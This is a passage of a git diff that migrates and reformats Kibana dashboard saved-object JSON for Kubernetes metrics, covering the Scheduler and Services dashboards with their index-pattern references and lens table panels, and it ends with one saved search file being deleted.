"1cd3ebab-9630-4253-b9a6-5f921e5cb617:indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:55eaa53f-a391-4996-9721-2f7af9aa963d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3a26dffa-0696-485d-b991-1dbc5092082e:indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3a26dffa-0696-485d-b991-1dbc5092082e:09d7cafe-19c4-4da8-a1b9-5ecd3ec6b0b0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:695725fe-9d35-49c6-8289-21fbe54ff2a6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c3fee68f-01c6-49da-a759-2900b1cd15bf:metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a0716ae8-4157-473d-8eba-8ff6625fed4b:indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a0716ae8-4157-473d-8eba-8ff6625fed4b:36494898-fe02-477e-9364-d94ea0fcb947", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "303702e1-ba33-49f2-b337-4cc7d7305606:indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1604f0de-edd6-456e-8670-ab9b33988abb:indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1604f0de-edd6-456e-8670-ab9b33988abb:38ef18ec-512c-4c90-ad86-214a5c9bfe9d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"f8313a9d-ab58-448e-b183-75f914caf53f:metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "668a51aa-98da-465e-9b09-d49e4f219968:indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "668a51aa-98da-465e-9b09-d49e4f219968:f3653393-ef8e-45e9-8b91-5a0472ecf752", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:c61ac757-89a1-4673-86b7-698a0d48e06e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1bd24fa1-319e-4cae-9d45-d821b06a8034:indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_f53d0d21-4502-4dce-8004-017a92104040:optionsListDataView", - "type": "index-pattern" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_df56c430-83b1-436e-8b9c-fb027aaa29ca:optionsListDataView", - "type": "index-pattern" - } + "title": "Average request latency" + } ], - "type": "dashboard", - "updated_at": "2023-01-11T16:15:10.039Z", - "version": "WzM0NzYsMV0=" + "timeRestore": false, + "title": "[Metrics Kubernetes] Scheduler", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd:metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a2b844d8-11e3-4469-af4b-744d33b603ad:indexpattern-datasource-layer-0c578d26-c937-4b73-a3a6-e15ebd5854e6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "125ec894-444e-486b-a9c8-7205cde12a7e:indexpattern-datasource-layer-8cad09ad-7860-45ac-aaad-7b94af09c33d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e6506b77-2e3b-4bfa-831a-8a5daada553b:indexpattern-datasource-layer-af585c84-2ebf-42a3-9073-4d76e8b2610d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "181a3fe5-e5b5-472e-98af-ea4aaadc3109:indexpattern-datasource-layer-c0fe3677-6a5b-4340-8ad0-d8e31b042fe8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "181a3fe5-e5b5-472e-98af-ea4aaadc3109:c038d00b-5e03-420e-9c45-a8aea3c41f99", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d35d8849-89ba-42b8-8120-c14b087f9690:indexpattern-datasource-layer-2b43c72b-5964-4c48-8239-72a42fbe334f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6:metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:6572ee4d-01b4-47db-8804-d8ef217e21da", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:55eaa53f-a391-4996-9721-2f7af9aa963d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"3a26dffa-0696-485d-b991-1dbc5092082e:indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3a26dffa-0696-485d-b991-1dbc5092082e:09d7cafe-19c4-4da8-a1b9-5ecd3ec6b0b0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:695725fe-9d35-49c6-8289-21fbe54ff2a6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c3fee68f-01c6-49da-a759-2900b1cd15bf:metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a0716ae8-4157-473d-8eba-8ff6625fed4b:indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a0716ae8-4157-473d-8eba-8ff6625fed4b:36494898-fe02-477e-9364-d94ea0fcb947", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "303702e1-ba33-49f2-b337-4cc7d7305606:indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1604f0de-edd6-456e-8670-ab9b33988abb:indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1604f0de-edd6-456e-8670-ab9b33988abb:38ef18ec-512c-4c90-ad86-214a5c9bfe9d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f8313a9d-ab58-448e-b183-75f914caf53f:metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "668a51aa-98da-465e-9b09-d49e4f219968:indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"668a51aa-98da-465e-9b09-d49e4f219968:f3653393-ef8e-45e9-8b91-5a0472ecf752", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:c61ac757-89a1-4673-86b7-698a0d48e06e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1bd24fa1-319e-4cae-9d45-d821b06a8034:indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_f53d0d21-4502-4dce-8004-017a92104040:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_df56c430-83b1-436e-8b9c-fb027aaa29ca:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013.json index f9ba2707c5c..6dd3d4d8ce2 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013.json 
@@ -1,309 +1,318 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"baa3640d-f954-4b56-ade6-01393a3991bc\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"baa3640d-f954-4b56-ade6-01393a3991bc\",\"enhancements\":{}}},\"5822d806-385b-435c-b83e-79e38e38fbb6\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"5822d806-385b-435c-b83e-79e38e38fbb6\",\"enhancements\":{}}},\"c749b037-7a98-4555-822b-cb9a52395dbb\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.service.name\",\"title\":\"Service Name\",\"id\":\"c749b037-7a98-4555-822b-cb9a52395dbb\",\"enhancements\":{}}}}" + "id": "kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1NywyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "twoLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"baa3640d-f954-4b56-ade6-01393a3991bc\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster 
Name\",\"id\":\"baa3640d-f954-4b56-ade6-01393a3991bc\",\"enhancements\":{}}},\"5822d806-385b-435c-b83e-79e38e38fbb6\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"5822d806-385b-435c-b83e-79e38e38fbb6\",\"enhancements\":{}}},\"c749b037-7a98-4555-822b-cb9a52395dbb\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.service.name\",\"title\":\"Service Name\",\"id\":\"c749b037-7a98-4555-822b-cb9a52395dbb\",\"enhancements\":{}}}}" + }, + "description": "Metrics about Services", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "60c70dea-d4f0-43ea-a43f-7927dcf5c34d", + "w": 48, + "x": 0, + "y": 0 }, - "description": "Metrics about Services", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "60c70dea-d4f0-43ea-a43f-7927dcf5c34d", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes 
DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "3df5f644-b37e-471c-b2c5-ad4db122d1de", + "w": 48, + "x": 0, + "y": 4 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "3df5f644-b37e-471c-b2c5-ad4db122d1de", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-15362d53-5f27-48a6-a339-8a5fc2c5339d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "009fece4-2d13-4c71-aeef-56c7288e17bf", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "15362d53-5f27-48a6-a339-8a5fc2c5339d": { + "columnOrder": [ + "5bcc83c1-a9ef-4489-841c-e5c6e82f346b", + "5288fb8d-2eec-4da6-a9e6-81e6ee0a429f", + "2d715eff-85bb-431f-a5a6-3432b6a704a9", + "07f7d695-1388-41fb-a4fc-4bf13d299688", + "8d4e5a02-d3f5-4960-b3a9-121f64d42ba6", + "226bd103-5a5d-4756-bbc5-2c7f5da03488" + ], + "columns": { + "07f7d695-1388-41fb-a4fc-4bf13d299688": { 
+ "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Cluster IP", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.service.cluster_ip" }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false + "226bd103-5a5d-4756-bbc5-2c7f5da03488": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Created", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.service.created" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "60c70dea-d4f0-43ea-a43f-7927dcf5c34d", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "60c70dea-d4f0-43ea-a43f-7927dcf5c34d", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0-SNAPSHOT" - }, - { - 
"embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-15362d53-5f27-48a6-a339-8a5fc2c5339d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "009fece4-2d13-4c71-aeef-56c7288e17bf", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "15362d53-5f27-48a6-a339-8a5fc2c5339d": { - "columnOrder": [ - "5bcc83c1-a9ef-4489-841c-e5c6e82f346b", - "5288fb8d-2eec-4da6-a9e6-81e6ee0a429f", - "2d715eff-85bb-431f-a5a6-3432b6a704a9", - "07f7d695-1388-41fb-a4fc-4bf13d299688", - "8d4e5a02-d3f5-4960-b3a9-121f64d42ba6", - "226bd103-5a5d-4756-bbc5-2c7f5da03488" - ], - "columns": { - "07f7d695-1388-41fb-a4fc-4bf13d299688": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Cluster IP", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.service.cluster_ip" - }, - "226bd103-5a5d-4756-bbc5-2c7f5da03488": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Created", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.service.created" - }, - "2d715eff-85bb-431f-a5a6-3432b6a704a9": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Type", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.service.type" - }, - "5288fb8d-2eec-4da6-a9e6-81e6ee0a429f": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Namespace", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.namespace" - }, - 
"5bcc83c1-a9ef-4489-841c-e5c6e82f346b": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Service Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.service.name" - }, - "8d4e5a02-d3f5-4960-b3a9-121f64d42ba6": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Ingress IP", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.service.ingress_ip" - } - }, - "incompleteColumns": {} - } - } - } + "2d715eff-85bb-431f-a5a6-3432b6a704a9": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Type", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.service.type" + }, + "5288fb8d-2eec-4da6-a9e6-81e6ee0a429f": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Namespace", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.namespace" + }, + "5bcc83c1-a9ef-4489-841c-e5c6e82f346b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Service Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "009fece4-2d13-4c71-aeef-56c7288e17bf", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_service" - }, - "type": "phrase" - }, 
- "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_service" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "columnId": "5bcc83c1-a9ef-4489-841c-e5c6e82f346b", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "07f7d695-1388-41fb-a4fc-4bf13d299688", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "2d715eff-85bb-431f-a5a6-3432b6a704a9", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "226bd103-5a5d-4756-bbc5-2c7f5da03488", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "5288fb8d-2eec-4da6-a9e6-81e6ee0a429f", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "8d4e5a02-d3f5-4960-b3a9-121f64d42ba6", - "isTransposed": false - } - ], - "layerId": "15362d53-5f27-48a6-a339-8a5fc2c5339d", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.service.name" }, - "title": "Services Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "8d4e5a02-d3f5-4960-b3a9-121f64d42ba6": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Ingress IP", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.service.ingress_ip" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "009fece4-2d13-4c71-aeef-56c7288e17bf", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_service" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - 
"i": "3df5f644-b37e-471c-b2c5-ad4db122d1de", - "w": 48, - "x": 0, - "y": 4 - }, - "panelIndex": "3df5f644-b37e-471c-b2c5-ad4db122d1de", - "title": "Services Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Services", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T14:25:08.717Z", - "id": "kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "3df5f644-b37e-471c-b2c5-ad4db122d1de:indexpattern-datasource-layer-15362d53-5f27-48a6-a339-8a5fc2c5339d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3df5f644-b37e-471c-b2c5-ad4db122d1de:009fece4-2d13-4c71-aeef-56c7288e17bf", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_baa3640d-f954-4b56-ade6-01393a3991bc:optionsListDataView", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_5822d806-385b-435c-b83e-79e38e38fbb6:optionsListDataView", - "type": "index-pattern" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_service" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "5bcc83c1-a9ef-4489-841c-e5c6e82f346b", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "07f7d695-1388-41fb-a4fc-4bf13d299688", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "2d715eff-85bb-431f-a5a6-3432b6a704a9", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "226bd103-5a5d-4756-bbc5-2c7f5da03488", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "5288fb8d-2eec-4da6-a9e6-81e6ee0a429f", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "8d4e5a02-d3f5-4960-b3a9-121f64d42ba6", + 
"isTransposed": false + } + ], + "layerId": "15362d53-5f27-48a6-a339-8a5fc2c5339d", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "Services Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_c749b037-7a98-4555-822b-cb9a52395dbb:optionsListDataView", - "type": "index-pattern" - } + "title": "Services Informations [Metrics Kubernetes]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] Services", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "3df5f644-b37e-471c-b2c5-ad4db122d1de:indexpattern-datasource-layer-15362d53-5f27-48a6-a339-8a5fc2c5339d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3df5f644-b37e-471c-b2c5-ad4db122d1de:009fece4-2d13-4c71-aeef-56c7288e17bf", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_baa3640d-f954-4b56-ade6-01393a3991bc:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_5822d806-385b-435c-b83e-79e38e38fbb6:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_c749b037-7a98-4555-822b-cb9a52395dbb:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/search/kubernetes-adc7d0c0-d1fc-11ec-8c69-8bbb7ca8f9ee.json b/packages/kubernetes/kibana/search/kubernetes-adc7d0c0-d1fc-11ec-8c69-8bbb7ca8f9ee.json deleted file mode 100644 index d17d85efaaa..00000000000 --- a/packages/kubernetes/kibana/search/kubernetes-adc7d0c0-d1fc-11ec-8c69-8bbb7ca8f9ee.json +++ /dev/null 
